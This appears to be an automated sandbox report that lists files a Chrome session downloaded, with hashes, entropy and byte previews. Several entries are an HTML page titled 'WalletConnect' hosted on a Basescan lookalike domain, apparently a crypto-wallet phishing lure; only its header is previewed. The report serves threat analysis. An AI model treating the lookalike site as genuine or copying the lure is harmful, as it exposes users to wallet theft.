                                                                                                                                                                                                                                              Size (bytes):6167
                                                                                                                                                                                                                                              Entropy (8bit):7.918910290347276
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:k52WJiUFsqNBsyuV/rKn8z2lEw9peCvR90r8CQLb4rLVTdq:y2pxoFu5U8qN9pee0r8Rm5q
                                                                                                                                                                                                                                              MD5:441971E141A5663B2F06E4926F3E3572
                                                                                                                                                                                                                                              SHA1:C6264BED94A71874CDF1D14BF3640580AD3B3F08
                                                                                                                                                                                                                                              SHA-256:2CA4AC3D1844EE99E8FAD83ED1DD3DE912D9B4A7C0F218EEB1F8545F77E2922C
                                                                                                                                                                                                                                              SHA-512:F5C7B3ADE4EF6A867E92C800DEEB9A922554C5A069A05150CA4CE8DB4130D2DEF3C2CC10FD35D3AC85EDCF354AB971AC81589E5D19161D22E415CD82D1F0709A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............\r.f....IDATx..Kh\e..}"..*>.......*..c.B..7.....u.t'X..U......kS...B......$:4..i.i.>.I.1M.GKM.9C.A.&..{.....?(m.I....fN..}.A.0<..#...0z.X69.-.....y.N^v:...v9.eb.w.C.e.y........}.}.}.}.}...K...}m{.{-{MT..2RG..-..!b}.y.h...u...Z...U_[*............{E. .N..=.Z...O......5...#.....7...T#......=...5.....q."...._a. @.......E...5.Fo.._.......VK8.....2W.u.u.<g..d.ZVk..3Vc8...^.v.|L^G..t..[...p..0.J...8z.... ...o.-.....|...=.r.!....b}.z..B.hO..f[l...B.O.7.e.z..B..#..q......Ys`...[.....B.<B^v"P...z.GC+R..O.k'..ZT{..Sp8Tk.w...aiyv..w..PUa.{-.l%...G..r...X.6U..8....Q..=...e.y..h#......a.............y.`|....+...........|.Gl.7.:j.9.=.....*9`.A..w.w1.l..>P/.......t..e.L..Ava6.$..=.;..0-H.a....Sm..K.#?..-.y.....I...Ya^.[......c.....3l.C...R.t9.~.M=.q...}."..m..t,...r.K`.D23....w^.a<./.....<.s^*0..'R..F)..O..`.....{z.P..1....E~...e..K.B1.OON.S3q.F.I..W.Hnrg.M.X.r..xff&6...FM..<.Q,?.._...9.r..J....OMM/.....1...$...1.#.u..l..........st.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1090
                                                                                                                                                                                                                                              Entropy (8bit):7.76267757145015
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:XRv4MIXGrWbd2nvwTXWAnjbWAegMQEqCRDZlnuFFNYk4Cv2l5F2X3/:hv9IWaJ2wjbWaAl7cFNYnCyG
                                                                                                                                                                                                                                              MD5:4DB055C49747AA50D14C24F10D7A1891
                                                                                                                                                                                                                                              SHA1:133A9542F088DB0D5A815816AC459FA159530980
                                                                                                                                                                                                                                              SHA-256:601A5E7D8EFC2FEBF00A794721354AC83CF4326542602DFA7C787711BC1ADCDD
                                                                                                                                                                                                                                              SHA-512:036C673E75C3FACB848EECF0271F08E17C4E2E55F5942B50B6835C0C7800865ADEF6039F42AAA2270D31FB73B77C73E68B53ADAB916BA7710871C25472BA3E9B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/images/gen/cons_20.png
                                                                                                                                                                                                                                              Preview:.PNG........IHDR.....................sRGB.........IDATx..]h.u..?.....lmnj......T.8m..\.....Q.........3.B...7....7.,..... ..HSgSt..._....m.E}.....|.........oH......_f.P..V5..[Z[E9}..^.<&.<..N.o{...m..79..^;qh.....>.uM......\.@...kO.~dgwT.\..W.j..{.2q`..7.[...o....rE2...F.[_..j..~GR...dSgDv-..t.m...u...."...eSQz`EL...*..V...%3...p..f...#'76...Q.;R...@:.....c.b..J...+".RQ9.xB...)...s.IF...6..jRj.7}...(....IG...'.......tEe......$.bB.xB.X. ...*5).J....h....p..6.f......]..5=..........c9.r@......S9[....Y.j+ .....jn..V8.....6............7..xA.=......ziE..y..`.}>......$k{...@).4.C.+.!zSA.J.]~.g..U.y.....a...H.TW(.^.q.0.f^.4x.VV11.?^4..2..BwR..;0.x..;..x..y.....rY.s#!N.QIO"CgK...|.C-7..,..L..\..>r~....>..(.*-......aAK.|.L....Q.&.~...yD..(....M.U.;..g..#"h.....T.]..... ~......W'..."..|>...!r.Ih.vN/X...r...1.......r&Uj..A2..U.1mn^.p.j5S... X.A...~.8...J8.5.'.C.uUYB5......&.........jj.<BeP..........A..._..>..P .u..R..J=....T6.c..E..A.n>WR.x........GV..~.F...$.e
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1490
                                                                                                                                                                                                                                              Entropy (8bit):7.86229140214927
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:LFFUvToaSfdIVlZ00C7O7RuLSIEs2ZrshQhfvJYpia3FqBYBIF1YMF/4:LYLoaadIVo6RuLS9rlfxYpb356t4
                                                                                                                                                                                                                                              MD5:AE8FE3F9B0AFFB3CBB327384BA4E4C9D
                                                                                                                                                                                                                                              SHA1:8004B4730BD959EC40CE1C811755A0D28DAFB987
                                                                                                                                                                                                                                              SHA-256:EC31EF769654E1A822F86F9E851119B27650C9475D0109508587F4D9B6CE574E
                                                                                                                                                                                                                                              SHA-512:73F04BE80D247FEBA02F2FA05A8E2C02389945D938CC3C97F90BE566F40E497DC2BDA0ADD9A44683CA3AB494C2CB86F56CC8C6A0238C0D6BBAE2D1B11B724B80
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/18-plus-DeAQLka0.png
                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8L..../..#..`.m...3.....m$.?....A.q5..N.1.I.7..+.DX...y...:..B.Cs.....I..Z.l.n#\@.Eq.....NL...;...@SW}.g."..Y...wy..r'.....w*10.s../SN....('ct9...;`..W#c^.u]52.k..1....0.(y5%`.....Xk\G..Vt.'V.W....t.1.....Q.RJ.G....d?.-.z*y.r...|Ou.o...>W...y..4....Y........: ...9V.[..a...../.1...:\....zx!...yW.W...`..Rh.,>.CE..f...{....E+.>(.(\.5.qa.D.eSZ....A.<_.....!~..i./....="...!....H.}9 u...A+..(.T.vZr....I.K].....(..m.=6.B.lH.2.V~.P..&..*...a.Q..x.-...9...........D..d.?.......:UU.u$S......C.ic..!.....vaS..l..MOb.K...,.oX7...p.'.%.L.O.....7N&&u{3.T...z`.......g....zdt.:.n.>?pl.....%....)0...QXo.....B!.,-x.).b...-{.N.*..i..........8.n.....a.....,....'.......!8..G.7.TX.K.t....>).KKU.iP.c..t.".y.....A......|..xUr#i.._=....q....:..`;cb4.Ns[..]J](../.&.....A.H..nN.........5..$..G....e...W{...".)T. .-a..V>J.'K..5......{l........3..V.|...C-..pK...-a.jz.+h}Z...s.[.xw.5.-.96.1^...e.siSj*s...+6.|o..pw...f.CM.p...~.hf..............,/....h.8..5.r[..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, Unicode text, UTF-8 text, with very long lines (3497)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):3500
                                                                                                                                                                                                                                              Entropy (8bit):5.36940427983699
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:4I4uOgJUMXT8lxetrYpzia1imVJ8FOFqiFXrjYI7g9sSBJZt1WNueLPuEwWJ5ura:qdQZG31+qqmXfYI7g9lnZmJJGqDf
                                                                                                                                                                                                                                              MD5:670D8C870892FEB70482D251AACE2D8A
                                                                                                                                                                                                                                              SHA1:A5E77D344C1A2C4DA9A66C17D09DB50AB98EE0D3
                                                                                                                                                                                                                                              SHA-256:FBE331CF7183F426205F094214ABF305972A0ADD67FC0F46ED606966898A9DC4
                                                                                                                                                                                                                                              SHA-512:3DA1AA0E6A7FE6ECCDB8283A8A918E775EE302777C1450C8C22EB7870CE9D4C8EE790224ED7DDF8B8069555AE035639F7F14627CB443F29BFE3B2E3945D8B435
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{ac as m,ab as d,c as e,ad as h,Q as x,i as s,ae as _,t as r,x as p,a8 as g,B as u,r as w,l as v,f as c,m as P,e as y}from"./index-DD2Zk4iT.js";var b=c('<div><h2 class="mt-4 text-center text-lg font-extrabold"></h2><p class="mt-4 text-center font-semibold text-secondary"></p><div class="mt-4 flex items-center"></div><div class="mt-2 flex font-semibold center mb-6">'),V=c('<svg xmlns=http://www.w3.org/2000/svg viewBox="0 0 32 32"class="icon size-6 text-brand"><path d="M12.0434 17.0183C12.9801 17.0183 13.7395 17.7778 13.7395 18.7145V25.3283C13.7395 26.265 12.9801 27.0244 12.0434 27.0244H10.2648C8.85937 27.0244 7.721 25.8852 7.721 24.4806V19.5629C7.721 18.1575 8.86019 17.0191 10.2648 17.0191H12.0434V17.0183ZM21.8077 17.0183C23.2132 17.0183 24.3515 18.1575 24.3515 19.5621V24.4798C24.3515 25.8852 23.2123 27.0236 21.8077 27.0236H20.0291C19.0925 27.0236 18.333 26.2641 18.333 25.3275V18.7136C18.333 17.777 19.0925 17.0175 20.0291 17.0175L21.8077 17.0183ZM15.9999 4.97559C22.6881 4.97559 28
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (559)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):560
                                                                                                                                                                                                                                              Entropy (8bit):4.808277179023729
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:wOtb3Lgwt2dti4/EfKwfvtUGzhXsJLZlLNMeWHTAqZpW8InWiu:wOhEXjJcVfvuehcdZbMeQAqZpyn8
                                                                                                                                                                                                                                              MD5:A95451EBD244375FB304EB994F68284C
                                                                                                                                                                                                                                              SHA1:74F86ECF5F4C90D05E80EFF3B27974896CB62547
                                                                                                                                                                                                                                              SHA-256:7C6B9EEA3D6DED152620650BEA6CD0CE6EC8C7EF9D23948F0FA627484611E9A7
                                                                                                                                                                                                                                              SHA-512:53284C98756651C0CE0BB7B9D1D23E934482EAFE000B387FD955E386F2E9CB4B446910AD7595E8F76F40802A54F7552D93A9F0DF163BBAEBBC43066C985A2C43
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:const e=globalThis._bc,{A:t,HashRouter:s,MemoryRouter:a,Navigate:r,Route:o,Router:u,StaticRouter:c,_mergeSearchString:i,action:n,cache:h,createAsync:m,createAsyncStore:R,createBeforeLeave:l,createMemoryHistory:v,createRouter:S,json:b,keepDepth:g,notifyIfNotBlocked:y,redirect:d,reload:f,revalidate:p,saveCurrentDepth:A,useAction:M,useBeforeLeave:B,useCurrentMatches:H,useHref:L,useIsRouting:N,useLocation:P,useMatch:_,useNavigate:k,useParams:C,useResolvedPath:D,useSearchParams:I,useSubmission:j,useSubmissions:q}=e.l5q36m;export{t as A,I as a,C as b,P as u};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 200 x 267, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):34731
                                                                                                                                                                                                                                              Entropy (8bit):7.992598289779212
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:768:VLXZ5NvVesckHHUvW3wVXtfhuqBDh4317Oyz5GLUwdJlHY6Kki9:1XZrvdLHwVXJG31CydoxLu9
                                                                                                                                                                                                                                              MD5:05E03ED758A57B7E273D9D1857372436
                                                                                                                                                                                                                                              SHA1:E69A3135151271D1FA103E9E37C0FA39DF050EB6
                                                                                                                                                                                                                                              SHA-256:7403E333EF7B9FE8963B6A89E0166EB7AEA2E7557040B34136110407D1BD0D2B
                                                                                                                                                                                                                                              SHA-512:9930542324C275FF677E1F2305D79626BE08EE80014F0671FBC0C9C2C04717E7D8773AC40BCCBD6F5C7D42E7FF5BA3FD629056DA907CBB68F89DAFF32795D6BC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............1^g....sRGB....... .IDATx^...%Gu&.........[.ii-hE.A. 0....1...`...=....3.}<?.x.m.l...../`.`.H,.#.o.n...........^fF........!at.T...[.....7"..O.2.LkM.[...eZ...".L.&..A.E ...!..........3Q._.=q.5V...$....Es..u..'kM/K.5$..K5..!.#.P.........4*..2.e`...,...<.......I..L.Gf.mm...Px>.0o.G a...._".s2.......ku.....b)..$kOI%0.P..HIVk.4.....2.VAR.N.?..L.7f.N.[]..$....M.Y.7..UTO...Z.92.#..<5....i.w...*J...P..7.a..L..^.VO.....p.rX...5...Mik...gk.QQ.G...-..,.tz..L/..UW.e`..R..0......... .ZHJ...KE.....1E.\i...D>g.Pf...i5B.e`e..)@..j(t.\.R...8..t.Z.,rZ1.Q.....B.".).o...'.........c.e`...c..6....C..H..&...Nr).}..f.VWH..|.t.b.....b6y>.2..%Hr.....K..dB...Cg.....+..O...CO1..'......}..7.!..V~n....X..Z .C$.....@.1C1.....jP..Gj.1.&1.$......%.Fd..-D.c...p..?xc......_..O.x.S}.K....W...s`I.a.)u.#..J...a..C....._P....aKi...%G.!...Q.x......%T!B..r.`.[9........#[.5.f.HK.L..}..Zir n...S.G.=".H*`*ol.e.D!.,]..Z..X...z..G.n...8. ve.........x[....
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):3828
                                                                                                                                                                                                                                              Entropy (8bit):7.94222538301877
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:cwTCkXZlC+lKMLp02iq+qSJQsz141buAtwKcLIkmmYQPWhEUVok+CAVhijpdiPKb:9TCk2+08pP+qSGuAqLLuuUZ8V09zjZxv
                                                                                                                                                                                                                                              MD5:E130F14D84DBDFA5CF40C627C3BD95A2
                                                                                                                                                                                                                                              SHA1:EE60F1EAF07A107F5F0D123E2E0A21164819A7FB
                                                                                                                                                                                                                                              SHA-256:EF555E8DAA3E80BB1D9F402BD09308EDCC7DB70BF886917BFFE2B9726E4C50B1
                                                                                                                                                                                                                                              SHA-512:EF7B46927DDFEAC1991D4F2053A9FA9122C48E96DB8E2F75E61B0FC875CD2755934C98C02277BF433E727C7A980FEE561B7A37C2D560D49FD3AF9D3ED862BFF5
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/coin/USDC.black.png
                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8L..../..1.&...........m.m.m[......z.|.m...*.ktv.....\..;6:.e.Y.b{v1F.......m[=..3./...m.....m..J.$.m}`.._.m.m.m..l2l.IQ..N..._.-..X..`gig.qKLV......f7.......m#G.4...^.....o..9"&........O.1A[v.....rW...z.......s.].:.9.'\.......WR..4 .........@@.v....."...............7&H...D5....>....}z. C.]..f.t.....e.#h.&1..F..........r...9.$..0....&W.g...........d.o.ub.JI...C...L...Nr#yZ......L...t.....#....e.n.I.u.y.B..#.|f.>w.h.P.....:~....q.aJ.w.%..K..>.^Jr.|2v....6}.....,........F0...]e.5.7....e.~.G.0uIs.Cv...'A....o..=..Ht.....h1..YQ..p...&..!..o.].B...Z..f.........&.*..8(.`.<#..G..A..g.G.t....O3...p$..#.6.$...T.f.2.....>...p..4.3....ea.rvr1.1.6.889...v._.r.........?k.=;.INL...jj....X...O.;K......U...5Ruy......!L)..gk:.=lxO[rD.X^.?....."..g].{....lr.H......Vl@.....;...I....8.....d.....r7.R...ug@k .j..F...}.....d:}.....>..dB........\+/-..U.....U...V......c4.!'}41=X....p..j..O.E.c8..a.(.C../.C#............[."..Ki....a...$.45
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1437
                                                                                                                                                                                                                                              Entropy (8bit):6.14649443929613
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:+ZYj6Lmkzum8COZNDsLlpGPUc6QlxHjV+AbUzUEqtgonauJvjlhwpkWTO0djC0EU:+ZYjwmklfll0xlxHjLUzUJyonXlvw9Tj
                                                                                                                                                                                                                                              MD5:40723003B3E38AE638707F7313970879
                                                                                                                                                                                                                                              SHA1:92623EB4E2C33EFEDC9D4AE1360C55ADC8F2C90F
                                                                                                                                                                                                                                              SHA-256:351B591983F8E3796D0E71F687AB1979E1EE90AC454A4A6883B35CBF55521EB6
                                                                                                                                                                                                                                              SHA-512:3DE07BBE15F39763CC4D77C55983C92B8D2A23F8B4B333220AAFBC62819E5F107FBDBF3A9EE03E4521CE07FB8AC737171D0221FAF4C719794C97CAED2FD7F837
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/e992b8c2a1.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D............3...j...(iinf..........infe........av01Color.....iprp...cipco....ispe.......d........pixi............av1C........colrprof....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0......colrnclx...........ipma...................rmdat........0@CA.2.......1..+T.1u...` L....i.v...d/M;f......t..08....Q...#O.:..o.mI.0.N..>!&.^HvbE......1{3-..'...w.z.....t...Q0....h.:`..2..Y..ZXgP.......P.W;.@?Q..R..m....6...v
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):331
                                                                                                                                                                                                                                              Entropy (8bit):7.085524417422163
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:6v/lhPUedEmyP983MaQjlBAKcjtyB8qp3PgpDj1dXFJjniknfAlbp:6v/7bflMD/AByXp3Pgp/vVJ2knfC
                                                                                                                                                                                                                                              MD5:C678260FE34FD3A3ABDD8AC5247D96C0
                                                                                                                                                                                                                                              SHA1:8224E46B5F8BA0174821930AA9EFFDFAAF3725E0
                                                                                                                                                                                                                                              SHA-256:E660B93234F23E254D479799132372CC9D39F54EA17B95DC066E22E47D1E2EE2
                                                                                                                                                                                                                                              SHA-512:4DF7831587686EC2CA110EEAEE955CF4F57874662085CDB6623F6425B9C68C0D14FB38C71937F94C84F8EC61D9633B79A47E8E3B2A429BFD87551A381B668D47
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/images/gen/bcgame_20c.png
                                                                                                                                                                                                                                              Preview:.PNG........IHDR.....................IDATx..K.a.....S.#............H(j...ko..&..f.!...h..D....E.......p...y.Y........c6q.k.&.E$.......n..|..#....I.E|C./...FxB6N..w..O.uq.%....m..v9w.X..QW.SW...R...T..Q.`..K...XE..'X.8.......=<.....:.'jT.JH.Mm...Yt..c..f...B..|3..{.@.@......w...Q.N......XM..K.L...Xv..{vqBE......IEND.B`.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/loaderImage.gif
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 24508, version 1.524
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):24508
                                                                                                                                                                                                                                              Entropy (8bit):7.992086479947047
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:384:bbUXi4bvfMAsFHhDN7WEW2fexHQj2Pfq/f45bG0HaVR9xTgND34Jr9:bolvkdHhx7Wp61j2Pi/WbGmeJgNcn
                                                                                                                                                                                                                                              MD5:10ACF267390967A39331940AE5D9F886
                                                                                                                                                                                                                                              SHA1:01042343227330F361B4FAD9F40548250ADF5830
                                                                                                                                                                                                                                              SHA-256:DAAC77F0CD78ADAAF6E7AEB20BACCD940103260A31603C3F07DD68696C0C4538
                                                                                                                                                                                                                                              SHA-512:06DB9FB79D1299679EE827C1733AB300169E42EBA986161A422FF950CB6CA37A2442CE139D8D7A838745AFA83D03B33C9A5F5DDC8BC09D0E74706A2C8FA52349
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/avertastd-semibold-BC-LINeP.woff2
                                                                                                                                                                                                                                              Preview:wOF2......_........`.._H.........................l?FFTM..2........`..R.....m.....L....6.$.....P.. ..^..>..1?webf....7.m.5.".......q#.......[..cO.......g...9Ie.M..).... ..a.e8v.U...a.....r..9..YM+..D5D.A.2.z.|b.).o...f..O-.zX.b+/..>......$..c...d.?....6;...!.M...,.......-~mS..o.,e|......l...Z..E~.%fI,3.......rq1i7+.[x...'..k.y...7..B......d.....A.....1x...{.,K.Rz..Q..}.V]D5rQ.+c......TN.NL.DOmj".q...-Y`*.T.....q.\....J......c.Q../? F....j.W../.. .A.2.$..6C.m..7..!....._].,* 5...c..;...wY.J.[.)..w...~..O(a...Iw..X....!........D..$..eR.H.....]...+....(...-P..*..).@...>.r...z..\.#k..|..|..;v....>....x....lh..............9...4F..H....C...iZ...a"e..........7b....r(`.G.o.c.Y..Q........u[.).9.......=...F.Qlm..le$9...}5SM[.EB.G..w...@.......B.>.>9.iiB..X.!..I...KlG...9{?./.Ir...{o.._.......PQ.....].:........D.j....Y.%(.0*..A.Y.p.{.t.......M.....}jS....:..M...{3.I...j.D..)......(L.5 -./3~S....6...H~.T.&.!.jcp...]..+...M....l.....}.=Ra-..P}3..T....K.B.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.html
